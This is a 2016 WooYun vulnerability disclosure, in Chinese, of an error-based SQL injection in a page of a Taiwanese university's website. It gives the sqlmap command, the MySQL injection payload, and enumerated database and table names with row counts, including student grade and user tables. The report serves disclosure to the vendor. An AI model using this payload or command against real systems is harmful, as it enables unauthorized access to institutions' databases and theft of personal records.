当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185106

漏洞标题:國立中興大學某处存在报错注入漏洞(涉及14库)(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2016-03-16 08:52

修复时间:2016-03-18 03:33

公开时间:2016-03-18 03:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-16: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

target:

http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343


error:

error.png


payload:

$ python sqlmap.py -u "http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343" --random-agent --dbms=mysql --technique=E


sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Uid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Uid=24343' AND (SELECT 6939 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(6939=6939,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WdzW'='WdzW
---
[21:22:33] [INFO] testing MySQL
[21:22:33] [INFO] confirming MySQL
[21:22:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0

漏洞证明:

databases:

available databases [14]:
[*] aacsb
[*] ccair
[*] cmeip
[*] cmeip_new
[*] com_ic
[*] cssm
[*] cssm_en
[*] cssm_en_new
[*] cssm_ip
[*] cssm_new
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


tables:

Database: cmeip_new
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| stu_grade          | 18170   |
| class_stu          | 3406    |
| history            | 1406    |
| others             | 1372    |
| core_ability_score | 1304    |
| `user`             | 1190    |
| userdata           | 1190    |
| prjournals         | 1140    |
| prproceedings      | 1105    |
| apmproceedings     | 1104    |
| international      | 480     |
| conference         | 326     |
| credit             | 263     |
| others1            | 209     |
| research           | 117     |
| textbooks          | 101     |
| edu                | 96      |
| exp                | 96      |
| books              | 90      |
| teacherdata        | 79      |
| functions          | 78      |
| mono               | 72      |
| photo              | 63      |
| class_teacher      | 43      |
| exam               | 33      |
| purview            | 27      |
| prpresentations    | 26      |
| patent             | 16      |
| chapters           | 11      |
| modules            | 11      |
| semester           | 11      |
| staffnum           | 11      |
| com_class          | 9       |
| core_ability       | 8       |
| announce           | 7       |
| core_ability_group | 4       |
| facworkshop        | 3       |
| nprjournals        | 3       |
| seminar            | 3       |
| soresearch         | 3       |
| `group`            | 1       |
| news               | 1       |
| online             | 1       |
+--------------------+---------+
Database: ccair
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| sam_usertime     | 346     |
| sam_userjob      | 299     |
| sam_userlang     | 294     |
| sam_userexpr     | 244     |
| sam_syscode      | 226     |
| sam_sysuser      | 168     |
| sam_userplan     | 143     |
| sam_compjob      | 129     |
| sam_continfo     | 128     |
| sam_usercert     | 111     |
| sam_vw_summer01  | 111     |
| sam_vw_validjob  | 102     |
| tmp              | 101     |
| sam_userresu     | 98      |
| sam_userbiog     | 96      |
| sam_vw_applyinfo | 86      |
| sam_userinfo     | 80      |
| sam_sysgrant     | 68      |
| sam_vw_jobcnt    | 68      |
| sam_sysnum       | 63      |
| sam_compinfo     | 57      |
| sam_tracinfo     | 40      |
| sam_sysmenu      | 35      |
| sam_vw_compwait  | 8       |
| sam_sysparams    | 6       |
| sam_pracinfo     | 3       |
| sam_vw_pracjobs  | 3       |
+------------------+---------+
Database: cssm
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| grs_tw_stats                 | 1072494 |
| grs_eng_stats                | 197256  |
| grs_tw_keywords              | 36817   |
| grs_tw_admin_log             | 13436   |
| grs_eng_admin_log            | 2177    |
| grs_tw_album_gallery         | 1295    |
| grs_eng_keywords             | 785     |
| grs_tw_business_file         | 461     |
| grs_tw_business              | 343     |
| grs_tw_article               | 324     |
| grs_tw_periodical_file       | 176     |
| grs_tw_teaching              | 150     |
| grs_tw_periodical            | 84      |
| grs_eng_album_gallery        | 82      |
| grs_tw_law_file              | 82      |
| grs_tw_faculty               | 78      |
| grs_eng_faculty              | 77      |
| grs_tw_form                  | 71      |
| grs_eng_shop_config          | 67      |
| grs_tw_flash_play            | 67      |
| grs_tw_shop_config           | 67      |
| grs_eng_cssm_config          | 57      |
| grs_tw_cssm_config           | 57      |
| grs_eng_article              | 53      |
| grs_tw_album                 | 49      |
| grs_tw_law                   | 48      |
| grs_tw_friend_link           | 45      |
| grs_tw_communicate           | 40      |
| grs_tw_program               | 40      |
| grs_eng_flash_play           | 35      |
| grs_admin_action             | 33      |
| grs_tw_building              | 29      |
| grs_eng_program              | 28      |
| grs_tw_course                | 25      |
| grs_tw_member                | 24      |
| grs_eng_friend_link          | 21      |
| grs_eng_business_file        | 18      |
| grs_eng_member               | 15      |
| grs_tw_business_cat          | 14      |
| grs_eng_college              | 13      |
| grs_eng_business_cat         | 11      |
| grs_tw_college               | 11      |
| grs_tw_form_cat              | 9       |
| grs_eng_periodical_file      | 8       |
| grs_eng_program_cat          | 8       |
| grs_eng_teaching             | 8       |
| grs_eng_faculty_category     | 7       |
| grs_tw_article_cat           | 7       |
| grs_tw_faculty_category      | 7       |
| grs_tw_law_cat               | 7       |
| grs_eng_album                | 6       |
| grs_eng_album_category       | 6       |
| grs_tw_album_category        | 6       |
| grs_admin_user               | 5       |
| grs_eng_article_cat          | 5       |
| grs_eng_communicate          | 5       |
| grs_tw_building_cat          | 4       |
| grs_eng_communicate_category | 3       |
| grs_eng_link_category        | 3       |
| grs_tw_communicate_category  | 3       |
| grs_tw_link_category         | 3       |
| grs_tw_program_cat           | 3       |
| grs_eng_course_category      | 2       |
| grs_eng_member_category      | 2       |
| grs_eng_periodical           | 2       |
| grs_eng_teaching_cat         | 2       |
| grs_tw_course_category       | 2       |
| grs_tw_member_category       | 2       |
| grs_tw_teaching_cat          | 2       |
| grs_eng_building             | 1       |
| grs_eng_course               | 1       |
| grs_eng_form                 | 1       |
+------------------------------+---------+
Database: aacsb
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| sam_coursescor    | 16085   |
| sam_courselist    | 6727    |
| sam_courseatte    | 1134    |
| sam_vw_coursescor | 208     |
| sam_coursegoal    | 200     |
| sam_courseinfo    | 162     |
| sam_goalrank      | 156     |
| sam_sysnum        | 111     |
| sam_degreegoal    | 83      |
| sam_sysuser       | 68      |
| sam_sysgrant      | 39      |
| sam_syscode       | 28      |
| sam_sysmenu       | 28      |
| sam_scoreclass    | 17      |
| sam_rankscore     | 10      |
| sam_sysparams     | 6       |
| sam_terminfo      | 5       |
| sam_sysnews       | 2       |
| sam_sysnewslist   | 2       |
+-------------------+---------+


由以上sqlmap注入出的数据即可证明SQL注入漏洞,可泄露相关数据库信息...

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-18 03:33

厂商回复:

驗證時該通報頁面已404

最新状态:

暂无

漏洞评价:

评价